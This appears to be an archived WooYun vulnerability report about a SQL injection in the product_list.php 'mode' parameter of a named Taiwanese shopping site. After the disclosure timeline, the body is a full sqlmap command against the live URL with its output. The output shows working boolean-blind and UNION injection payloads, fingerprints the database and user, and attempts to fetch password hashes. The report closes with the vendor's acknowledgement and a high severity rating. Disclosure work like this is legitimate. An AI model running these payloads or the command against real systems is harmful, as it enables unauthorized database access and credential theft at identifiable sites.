乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-31: 细节已通知厂商并且等待厂商处理中 2015-04-03: 厂商已经确认,细节仅向厂商公开 2015-04-13: 细节向核心白帽子及相关领域专家公开 2015-04-23: 细节向普通白帽子公开 2015-05-03: 细节向实习白帽子公开 2015-05-18: 细节向公众公开
RT
[root@Hacker~]# Sqlmap sqlmap.py -u "http://ismall.com.tw/product_list.php?mode=116" --dbs --passwords --current-user --current-db --is-dba sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no[*] starting at 13:56:50[13:56:50] [INFO] resuming back-end DBMS 'mysql'[13:56:51] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: mode Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mode=116' AND 8874=8874 AND 'dBki'='dBki Type: UNION query Title: MySQL UNION query (NULL) - 35 columns Payload: mode=116' UNION ALL SELECT CONCAT(0x7162766571,0x504a75795a534158526b,0x7175716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,---[13:56:51] [INFO] the back-end DBMS is MySQLweb application technology: Apache, PHP 4.3.9back-end DBMS: MySQL 4[13:56:51] [INFO] fetching current usercurrent user: 'ismall@%'[13:56:51] [INFO] fetching current databasecurrent database: 'ismall'[13:56:51] [INFO] testing if current user is DBA[13:56:51] [INFO] fetching current user[13:56:52] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'current user is DBA: False[13:56:52] [INFO] fetching database users password hashes[13:56:52] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique[13:56:53] [WARNING] the SQL query provided does not return any output[13:56:53] [INFO] fetching database users[13:56:54] [WARNING] the SQL query provided does not return any output[13:56:54] [INFO] fetching number of database users[13:56:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[13:56:54] [INFO] retrieved:[13:56:55] [CRITICAL] unable to retrieve the number of database users[13:56:55] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database[13:56:56] [WARNING] the SQL query provided does not return any output[13:56:56] [INFO] fetching number of databases[13:56:56] [INFO] retrieved:[13:56:57] [ERROR] unable to retrieve the number of databases[13:56:57] [INFO] falling back to current database[13:56:57] [INFO] fetching current databaseavailable databases [1]:[*] ismall[13:56:57] [INFO] fetched data logged to text files under 'E:\INJECT~1\SQLMAP~1.4\Bin\output\ismall.com.tw'
null
危害等级:高
漏洞Rank:15
确认时间:2015-04-03 02:13
感謝通報
暂无